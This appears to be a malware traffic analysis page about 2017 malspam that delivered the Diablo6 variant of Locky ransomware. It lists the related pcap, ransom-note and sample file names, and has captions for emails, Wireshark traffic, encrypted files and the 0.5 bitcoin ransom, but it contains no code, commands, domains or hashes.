2017-08-09 - MALWARE & TRAFFIC FROM MALSPAM PUSHING DIABLO6 VARIANT OF LOCKY

ASSOCIATED FILES:

  • 2017-08-09-Locky-malspam-traffic.pcap   (556,954 bytes)
  • 2017-08-09-Locky-decryption-instructions-diablo6.bmp   (5,666,614 bytes)
  • 2017-08-09-Locky-decryption-instructions-diablo6.htm   (8,913 bytes)
  • 2017-08-09-Locky-executable.exe   (620,544 bytes)
  • 2017-08-09 (263).vbs   (5,892 bytes)
  • 2017-08-09 (780).zip   (2,125 bytes)

 

NOTES:

 

A BLOG POST AND SOME TWEETS ABOUT THIS:

 

EMAILS


Shown above:  An example of what the emails looked like.

 


Shown above:  The zip archive attachement and extracted VBS file.

 

TRAFFIC


Shown above:  Traffic from an infection filtered in Wireshark.

 

ASSOCIATED DOMAINS:

 

FILE HASHES

ZIP ARCHIVE FROM THE EMAIL:

EXTRACTED .VBS FILE:

LOCKY EXECUTABLE RETRIEVED FROM THE INFECTED HOST:

 

SCREENSHOTS


Shown above:  Screenshot from a Windows host infected with this Diablo6 variant of Locky.

 


Shown above:  Examples of encrypted files.

 


Shown above:  Locky decryption from the Tor domain.

 


Shown above:  0.5 bitcoin was the ransom cost.

 

FINAL NOTES

Once again, here are the associated files:

Zip archives are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.